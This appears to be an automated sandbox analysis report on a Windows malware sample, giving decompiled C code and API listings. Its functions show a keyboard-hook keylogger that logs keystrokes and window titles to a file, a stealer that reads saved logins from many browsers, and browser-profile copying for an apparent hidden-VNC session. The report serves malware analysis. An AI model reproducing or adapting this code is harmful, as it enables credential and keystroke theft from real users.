                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?), ref: 004138EB
                                  • CreateProcessW.KERNEL32(-00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00413953
                                  • CharLowerW.USER32(00000000), ref: 00413736
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFindFileNameW.SHLWAPI(00000006), ref: 00413747
                                  • CharLowerW.USER32(00000000), ref: 0041374E
                                  • SHFileOperationW.SHELL32(?), ref: 0041381F
                                  • CreateDirectoryW.KERNEL32(00000006,00000000,?,?,?,?,?), ref: 00413827
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Create$FilePathlstrlen$CharFindLowerNameProcess$AssocDesktopDirectoryFolderFreeObjectOperationQuerySingleSpecialStringVirtualWaitlstrcatlstrcpy
                                  • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="$-no-remote -profile "$Path$Profile0$\AppData\Local\GoogleBackup$\AppData\Local\Google\Chrome\User Data$\AppData\Roaming\FirefoxBackup$\AppData\Roaming\Mozilla\Firefox\$\prefs.js$\xcopy.exe$chrome.exe$firefox.exe$http$iexplore.exe$open$profiles.ini$user_pref("layers.acceleration.disabled", true);$vnc$xcopy.exe /H /Y /E /C
                                  • API String ID: 1980048621-2122738177
                                  • Opcode ID: 008eb418cd185a08f061ac9b4d884c46518dc2f5a58d9e4c032b65e020894d83
                                  • Instruction ID: d1ee3767f8a76cc5fff92834ee7294f166e8d308623be65a05114b919e0f7e15
                                  • Opcode Fuzzy Hash: 008eb418cd185a08f061ac9b4d884c46518dc2f5a58d9e4c032b65e020894d83
                                  • Instruction Fuzzy Hash: 11226871A00209ABCB15EBA2DC96EEEBB7CAF44709F10407AF502B61D1DF785B45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040813A, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040813A(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E004085CB(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E004085C0();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E004085AE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E004085CB( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M00408586))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

































                                  0x0040813a
                                  0x0040813a
                                  0x00408143
                                  0x00408146
                                  0x00408149
                                  0x0040814d
                                  0x00408150
                                  0x00408155
                                  0x00408160
                                  0x00408165
                                  0x00408213
                                  0x00408216
                                  0x00408264
                                  0x00408264
                                  0x00408267
                                  0x00408387
                                  0x00408389
                                  0x00408460
                                  0x00408462
                                  0x004084f5
                                  0x004084f5
                                  0x004084fb
                                  0x00408556
                                  0x0040855c
                                  0x00408561
                                  0x00408564
                                  0x00408566
                                  0x00408566
                                  0x0040856b
                                  0x0040856b
                                  0x00000000
                                  0x0040856b
                                  0x004084fd
                                  0x004084fd
                                  0x00408500
                                  0x0040853f
                                  0x00408545
                                  0x0040854a
                                  0x0040841e
                                  0x0040841e
                                  0x00408421
                                  0x00000000
                                  0x00408421
                                  0x00408502
                                  0x00408505
                                  0x00408528
                                  0x0040852e
                                  0x00408533
                                  0x00000000
                                  0x00408533
                                  0x00408507
                                  0x0040851b
                                  0x00408521
                                  0x00000000
                                  0x00408521
                                  0x00408468
                                  0x004084e0
                                  0x004084e6
                                  0x004084eb
                                  0x00000000
                                  0x004084eb
                                  0x0040846a
                                  0x0040846a
                                  0x00408470
                                  0x004084c9
                                  0x004084cf
                                  0x004084d4
                                  0x00000000
                                  0x004084d4
                                  0x00408472
                                  0x00408472
                                  0x00408475
                                  0x004084b2
                                  0x004084b8
                                  0x004084bd
                                  0x00000000
                                  0x004084bd
                                  0x00408477
                                  0x00408477
                                  0x0040847a
                                  0x0040849b
                                  0x004084a1
                                  0x004084a6
                                  0x00000000
                                  0x004084a6
                                  0x0040847c
                                  0x0040847f
                                  0x00000000
                                  0x00000000
                                  0x00408487
                                  0x0040848d
                                  0x00408492
                                  0x00000000
                                  0x00408492
                                  0x0040838f
                                  0x00408449
                                  0x0040844f
                                  0x00408454
                                  0x00000000
                                  0x00408454
                                  0x00408395
                                  0x0040839b
                                  0x004083f0
                                  0x004083f6
                                  0x0040843d
                                  0x0040843d
                                  0x00000000
                                  0x0040843d
                                  0x004083f8
                                  0x004083fe
                                  0x0040842b
                                  0x00408431
                                  0x00408436
                                  0x00000000
                                  0x00408436
                                  0x00408400
                                  0x00408406
                                  0x00000000
                                  0x00000000
                                  0x0040840e
                                  0x00408414
                                  0x00408419
                                  0x00000000
                                  0x00408419
                                  0x0040839d
                                  0x004083a3
                                  0x004083e6
                                  0x004083e6
                                  0x00000000
                                  0x004083e6
                                  0x004083a5
                                  0x004083a8
                                  0x004083dc
                                  0x00000000
                                  0x004083dc
                                  0x004083aa
                                  0x004083ad
                                  0x004083d2
                                  0x00000000
                                  0x004083d2
                                  0x004083af
                                  0x004083b2
                                  0x004083c8
                                  0x00000000
                                  0x004083c8
                                  0x004083ba
                                  0x004083bd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004083c3
                                  0x0040826d
                                  0x00408378
                                  0x00000000
                                  0x00408378
                                  0x00408273
                                  0x00408276
                                  0x004082f6
                                  0x004082f9
                                  0x00408347
                                  0x00408347
                                  0x0040834a
                                  0x0040836e
                                  0x00000000
                                  0x0040836e
                                  0x0040834c
                                  0x0040834c
                                  0x0040834f
                                  0x00408364
                                  0x00000000
                                  0x00408364
                                  0x00408351
                                  0x00408354
                                  0x00000000
                                  0x00000000
                                  0x0040835a
                                  0x00000000
                                  0x0040835a
                                  0x004082fb
                                  0x0040833d
                                  0x00000000
                                  0x0040833d
                                  0x004082fd
                                  0x004082fd
                                  0x00408300
                                  0x00408333
                                  0x00000000
                                  0x00408333
                                  0x00408302
                                  0x00408302
                                  0x00408305
                                  0x00408329
                                  0x00000000
                                  0x00408329
                                  0x00408307
                                  0x00408307
                                  0x0040830a
                                  0x0040831f
                                  0x00000000
                                  0x0040831f
                                  0x0040830c
                                  0x0040830f
                                  0x00000000
                                  0x00000000
                                  0x00408315
                                  0x00000000
                                  0x00408315
                                  0x00408278
                                  0x004082ec
                                  0x00000000
                                  0x004082ec
                                  0x0040827a
                                  0x0040827d
                                  0x004082c0
                                  0x004082c0
                                  0x004082c3
                                  0x00000000
                                  0x00000000
                                  0x004082ca
                                  0x004082ca
                                  0x004082cd
                                  0x004082e2
                                  0x00000000
                                  0x004082e2
                                  0x004082cf
                                  0x004082d2
                                  0x00000000
                                  0x00000000
                                  0x004082d8
                                  0x00000000
                                  0x004082d8
                                  0x0040827f
                                  0x00000000
                                  0x00000000
                                  0x00408285
                                  0x00408285
                                  0x00408288
                                  0x004082b6
                                  0x00000000
                                  0x004082b6
                                  0x0040828a
                                  0x0040828a
                                  0x0040828d
                                  0x004082ac
                                  0x00000000
                                  0x004082ac
                                  0x0040828f
                                  0x0040828f
                                  0x00408292
                                  0x004082a2
                                  0x00000000
                                  0x004082a2
                                  0x00408294
                                  0x00408297
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040829d
                                  0x00408218
                                  0x00408218
                                  0x0040821b
                                  0x00000000
                                  0x00000000
                                  0x0040821d
                                  0x0040822c
                                  0x00408239
                                  0x00408241
                                  0x0040824b
                                  0x00408257
                                  0x0040825c
                                  0x00000000
                                  0x0040825c
                                  0x0040816e
                                  0x00000000
                                  0x00000000
                                  0x0040817f
                                  0x00408202
                                  0x0040820b
                                  0x00000000
                                  0x0040820b
                                  0x00408181
                                  0x00408184
                                  0x00408187
                                  0x00000000
                                  0x00000000
                                  0x0040818d
                                  0x00000000
                                  0x00408194
                                  0x00000000
                                  0x00000000
                                  0x0040819e
                                  0x00000000
                                  0x00000000
                                  0x004081a8
                                  0x00000000
                                  0x00000000
                                  0x004081b2
                                  0x00000000
                                  0x00000000
                                  0x004081bc
                                  0x00000000
                                  0x00000000
                                  0x004081c6
                                  0x00000000
                                  0x00000000
                                  0x004081d0
                                  0x00000000
                                  0x00000000
                                  0x004081da
                                  0x00000000
                                  0x00000000
                                  0x004081e4
                                  0x00000000
                                  0x00000000
                                  0x004081ee
                                  0x00000000
                                  0x00000000
                                  0x00408570
                                  0x00408570
                                  0x00408581
                                  0x00408581

                                  APIs
                                  • GetAsyncKeyState.USER32 ref: 00408176
                                  • CallNextHookEx.USER32 ref: 00408577
                                    • Part of subcall function 004085CB: GetForegroundWindow.USER32 ref: 004085F4
                                    • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                    • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                    • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                  • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                  • API String ID: 2452648998-4143582258
                                  • Opcode ID: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction ID: 005c92b7aa13bd5785e0d60a0273475475fd8f33417f3dbf942b8c71a30de329
                                  • Opcode Fuzzy Hash: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction Fuzzy Hash: 0791C132A4C910ABCB1892288F586BA2531A7917A4F10C17FD9C3B77D1DF7C9E82524F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B917, Relevance: 35.2, Strings: 28, Instructions: 218COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E0040B917(void* __edx, intOrPtr _a4) {
				char _v48;
				char _v56;
				char _v60;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v352;
				void* _t31;
				intOrPtr* _t59;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				intOrPtr* _t86;
				intOrPtr* _t88;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t126;
				void* _t134;
				void* _t135;
				intOrPtr _t139;
				signed int _t140;
				void* _t142;

				_t133 = __edx;
				_t142 = (_t140 & 0xfffffff8) - 0x34;
				_t72 = _a4;
				 *0x426864 = _t72;
				_t73 =  *((intOrPtr*)(_t72 + 4));
				E00415847(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0);
				_t143 = _v56;
				if(_v56 != 0) {
					_push(_t73);
					E0040315E(_t142,  &_v48);
					_t76 =  *0x426864; // 0x0
					E00409718( *_t76, _t133, _t73);
					_t78 =  *0x426864; // 0x0
					_t31 = E0040973F( *_t78, _t143);
					_t144 = _t31;
					if(_t31 != 0) {
						_t134 = 0x1a;
						E00410C8A( &_v56, _t134, _t144);
						_t135 = 0x1a;
						E00410C8A( &_v60, _t135, _t144);
						_t84 =  *0x426864; // 0x0
						E0040BC0D( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
						_t86 =  *0x426864; // 0x0
						E0040BC0D( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
						_t88 =  *0x426864; // 0x0
						E0040BC0D( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
						_t90 =  *0x426864; // 0x0
						E0040BC0D( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
						_t92 =  *0x426864; // 0x0
						E0040BC0D( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
						_t94 =  *0x426864; // 0x0
						E0040BC0D( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
						_t96 =  *0x426864; // 0x0
						E0040BC0D( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
						_t98 =  *0x426864; // 0x0
						E0040BC0D( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
						_t100 =  *0x426864; // 0x0
						E0040BC0D( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
						_t102 =  *0x426864; // 0x0
						E0040BC0D( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
						_t104 =  *0x426864; // 0x0
						E0040BC0D( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
						_t106 =  *0x426864; // 0x0
						E0040BC0D( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
						_t108 =  *0x426864; // 0x0
						E0040BC0D( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
						_t110 =  *0x426864; // 0x0
						E0040BC0D( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
						_t112 =  *0x426864; // 0x0
						E0040A968( *_t112, _t135, _t144);
						_t114 =  *0x426864; // 0x0
						E0040983D( *_t114, _t135, _t144);
						E0040373F(_t142,  &_v340);
						_t117 =  *0x426864; // 0x0
						E00409E2D( *_t117, _t144,  *_t114);
						E0040373F(_t142,  &_v344);
						_t120 =  *0x426864; // 0x0
						E0040A36F( *_t120, _t144,  *_t117);
						E004096D6(_t144);
						_t59 =  *0x426864; // 0x0
						E004020F0( &_v340, _t144,  *_t59);
						_v328 = 0x41a830;
						E004020F0( &_v324, _t144,  &_v344);
						_t126 =  *0x426864; // 0x0
						E00405044( *((intOrPtr*)(_t126 + 8)),  &_v332);
						E004154AA( &_v336);
						_t129 = _v352;
						if(_v352 != 0) {
							E00401AD0(_t129, _t129);
						}
						_t66 =  *0x426864; // 0x0
						_t67 =  *_t66;
						_t130 =  *((intOrPtr*)(_t67 + 0x10));
						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
							E00405FEB(_t130);
						}
						E00405FEB(_v60);
						E00405FEB(_v56);
					}
					_t80 =  *0x426864; // 0x0
					_t139 =  *_t80;
					E00406034(_t80);
					_t22 = _t139 + 0x24; // 0x24
					E00401F98(_t22);
				}
				E00403148( &_v48);
				return 0;
			}














































                                  0x0040b917
                                  0x0040b91d
                                  0x0040b920
                                  0x0040b92a
                                  0x0040b934
                                  0x0040b938
                                  0x0040b93d
                                  0x0040b941
                                  0x0040b947
                                  0x0040b950
                                  0x0040b955
                                  0x0040b95d
                                  0x0040b962
                                  0x0040b96a
                                  0x0040b96f
                                  0x0040b971
                                  0x0040b979
                                  0x0040b97e
                                  0x0040b985
                                  0x0040b98a
                                  0x0040b98f
                                  0x0040b9a5
                                  0x0040b9aa
                                  0x0040b9c0
                                  0x0040b9c5
                                  0x0040b9db
                                  0x0040b9e0
                                  0x0040b9f7
                                  0x0040b9fc
                                  0x0040ba12
                                  0x0040ba17
                                  0x0040ba2e
                                  0x0040ba33
                                  0x0040ba49
                                  0x0040ba4e
                                  0x0040ba64
                                  0x0040ba69
                                  0x0040ba7f
                                  0x0040ba86
                                  0x0040ba9a
                                  0x0040ba9f
                                  0x0040bab5
                                  0x0040baba
                                  0x0040bad0
                                  0x0040bad5
                                  0x0040baeb
                                  0x0040baf0
                                  0x0040bb06
                                  0x0040bb0b
                                  0x0040bb13
                                  0x0040bb18
                                  0x0040bb20
                                  0x0040bb2d
                                  0x0040bb32
                                  0x0040bb3a
                                  0x0040bb47
                                  0x0040bb4c
                                  0x0040bb54
                                  0x0040bb61
                                  0x0040bb66
                                  0x0040bb71
                                  0x0040bb7a
                                  0x0040bb87
                                  0x0040bb8c
                                  0x0040bb9a
                                  0x0040bba3
                                  0x0040bba8
                                  0x0040bbae
                                  0x0040bbb1
                                  0x0040bbb1
                                  0x0040bbb6
                                  0x0040bbbb
                                  0x0040bbbd
                                  0x0040bbc2
                                  0x0040bbc4
                                  0x0040bbc4
                                  0x0040bbcd
                                  0x0040bbd6
                                  0x0040bbd6
                                  0x0040bbdb
                                  0x0040bbe1
                                  0x0040bbe3
                                  0x0040bbe8
                                  0x0040bbeb
                                  0x0040bbeb
                                  0x0040bbf4
                                  0x0040bbff

                                  Strings
                                  • \Blisk\User Data\Default\Login Data, xrefs: 0040BA44
                                  • \Chromium\User Data\Default\Login Data, xrefs: 0040BA5F
                                  • \Blisk\User Data\Local State, xrefs: 0040BA3F
                                  • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040B9F2
                                  • \Vivaldi\User Data\Local State, xrefs: 0040BA8E
                                  • \Epic Privacy Browser\User Data\Local State, xrefs: 0040B9B6
                                  • \Slimjet\User Data\Local State, xrefs: 0040BAE1
                                  • \UCBrowser\User Data_i18n\Local State, xrefs: 0040B9ED
                                  • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040B9BB
                                  • \Microsoft\Edge\User Data\Local State, xrefs: 0040B9D1
                                  • \Opera Software\Opera Stable\Login Data, xrefs: 0040BA29
                                  • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040BA75
                                  • \Chromium\User Data\Local State, xrefs: 0040BA5A
                                  • \Comodo\Dragon\User Data\Local State, xrefs: 0040BAAB
                                  • \Torch\User Data\Local State, xrefs: 0040BAC6
                                  • \CentBrowser\User Data\Default\Login Data, xrefs: 0040BB01
                                  • \Google\Chrome\User Data\Local State, xrefs: 0040B99B
                                  • \Slimjet\User Data\Default\Login Data, xrefs: 0040BAE6
                                  • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040BAB0
                                  • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040BA08
                                  • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040B9A0
                                  • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040BA7A
                                  • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040BA0D
                                  • \Opera Software\Opera Stable\Local State, xrefs: 0040BA24
                                  • \CentBrowser\User Data\Local State, xrefs: 0040BAFC
                                  • \Torch\User Data\Default\Login Data, xrefs: 0040BACB
                                  • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040B9D6
                                  • \Vivaldi\User Data\Default\Login Data, xrefs: 0040BA95
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                  • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                  • API String ID: 2377953819-4166025770
                                  • Opcode ID: 7f47958bac4a6e5bb76ade14613cb2583ff2f16c54ab432812a73e7ecd254522
                                  • Instruction ID: b504e976bd3a8729c7f51a6cb9f8188f68cbd7fbd8cbaae42897a142990720c6
